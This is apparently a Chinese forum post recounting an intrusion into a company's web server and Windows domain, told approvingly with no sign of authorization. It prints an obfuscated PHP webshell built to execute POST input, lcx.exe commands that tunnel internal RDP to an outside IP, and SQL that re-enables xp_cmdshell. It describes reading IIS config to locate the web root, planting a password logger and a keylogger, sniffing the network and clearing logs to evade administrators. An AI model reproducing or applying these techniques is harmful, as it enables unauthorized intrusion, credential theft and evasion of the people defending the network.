一次域渗透尝试

先对目标站进行信息收集：扫了下目录，iis6，发现了后台，并且存在目录遍历：

存在目录遍历我寻思着找点有用的东西，看看有没有前人留下的脚印啥的，直接踩上去多方便，但是翻了一半天无果。从前台找找有没有有用的东西，发现新闻更新的挺勤的，说明管理员还是经常上线，想着x点cookie,结果找遍了都没有发现可以x的地方。

 

结果惊喜发现存在sql注入：

做到了这里，心想这个站还不轻松拿下么？？感觉shell已经在向我招手啦，用sqlmap跑起来：

解出Md5，前边已经得出了后台地址，于是转至后台拿shell，然后添加产品传图片

几番测试，发现是白名单过滤，考虑用iis6的解析漏洞来搞，但是，传上去会被重命名：

用bursuite抓了一下包试试，截断一下也不管用，感觉拿shell陷入困境。

整理了下思路，这个网站有注入点，是Php+mysql+iis6这样的结构，有后台地址，存在目录遍历，后台拿shell是失败了，但是前台拿shell呢？但是前台写shell需要满足三个条件，一个是权限，一个是转义函数是否开启，一个是网站物理路径。于是测试了一下，发现是dba权限：

 

好了，现在我们权限有了。然后也发现了魔法转义函数并没有开启：

那么第三个问题来啊了，网站物理路径上哪里去找？这是个很头疼的问题，大多数时候都是通过报错来找，但是很可惜这个网站报错爆不出物理路径，想通过目录遍历来翻找，但是也还是找不到。这个时候我注意到了这个网页服务器是iis6，而不是apache，突然想起来iis的配置文件c:\windows\system32\inetsrv\MetaBase.xml 中很可能保存着网站的物理路径，于是用load_file()函数来读一下试试：

 

OK，成功找出网站物理路径，下一步就是写shell，感觉用手工要方便的多，于是直接用手工吧：

可是....这个结果也是让我大吃一惊...居然没写进去！！难道是我手残语句不对？？那我用工具好了，祭出sqlmap,然而也没写进去:

 

我擦....神器都写不进去还玩个毛....感觉写shell没希望了。不行，不能放弃，我就不信写不进去，突然想起穿山甲也有个写shell的功能，只要有一丝希望就不能放弃！，于是乎掏出了灰尘扑扑的穿山甲：

哈哈哈，终于写进来了，真爽啊，然而.....当我访问的时候却出现：

 

我擦..这又是个什么情况..我是真的想骂人了哈，算了算了换个马得了，换个猥琐点的：<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> OK！Shell到手：

支持aspx，于是传个aspx的马上去看看：

不是system权限，得提权，结果执行tasklist /svc一看，360全套啊，不好整：

 

再收集收集点信息，结果竟让我让我发现了这个，嘿嘿，真是人品爆发了：

 

开着3389，可以考虑远程连接一下。

 

并且还存在域，可以试着玩玩内网：

 

这台机器的主机名叫webserver，在GAONENG这个域里，然后试着收集一下域用户管理，找找域控之类的信息：

我擦..这是个什么鬼..又试了很多东西，结果发现都是同样的症状，不管了，先连上3389再说吧，因为服务器在内网，直接连外网IP不行，所以只好通过lcx.exe转发出来，我的工具里面只有lcx不被杀了，为了避免被管理员发现，只能晚上偷偷的潜入：在外网IP上执行lcx.exe -listen 51 33891在内网服务器上执行 lcx.exe -slave 外网IP 51 127.0.0.1 3389然后在外网IP上远程连接127.0.0.1:33891就可以连上内网的3389了：

Ok，然后直接用administrator的账户和密码就登陆上去了，因为本地的用户不多，全在IIS侦探里面就能看到明文，所以就没有做导hash这个操作，但是密码太少，也不是件好事，然后把收集到的密码，包括windows密码和root密码，做成一个字典，然后挂在hscan上面扫一下弱口令：

结果仅仅只是扫出了两个弱口令，还有个sa权限的弱口令，并且129的这台机器还开了3389的端口，感觉有戏，就上连接器试试：结果发现xp_cmdshell被禁止了：

但是没关系，执行sql语句EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;开启就行，然后查看了一下权限，我勒个擦，竟然被降权了！！

 

感觉整个人都不好了，那估计是提权没辙了，但是可以搜集一下信息，继续查看:

诶，这跟webserver是在一个域里面，于是找找域控，看看这台机器上能不能搜集域信息：

 

OK，找到域控了，这下有了目标，对域控进行一番端口扫描后并没有发现什么有用的东西，只发现域控开了3389端口。现在整理了下思路，感觉手中收集到的密码不够多，并且装360的机器也蛮多的，也不好传东西上去，由于经验不足，所以想到的思路也很少，在这里卡了很久，最后实在没办法了，只能姜太公钓鱼——愿者上钩了：于是在webserver这台服务器上种了NTPass，看看能不能记录到域管理员的密码。然后又种了键盘记录器，因为他们内部有个网站，但是需要密码才能进，所以希望能记录到登录的密码。

最后装上了cain，实在没思路了才来嗅探，虽然很容易被发现(事实证明果然被发现了):

弄完这些，清理了日志就洗洗睡了，准备第二天上来看看成果，结果第二天醒来，用shell一看，我擦，东西给我删完了，键盘记录的文件也没了，cain也没了，只有个NTPASS的记录文件还在

但是啥都没记到，都是我自己登录的。准备连3389端口进去重新搞，结果悲催的发现他把3389的端口都给我关了：

感觉没戏了...只有默默的等待3389重开那一天.......

 

============================

过程很完整，不错。通过。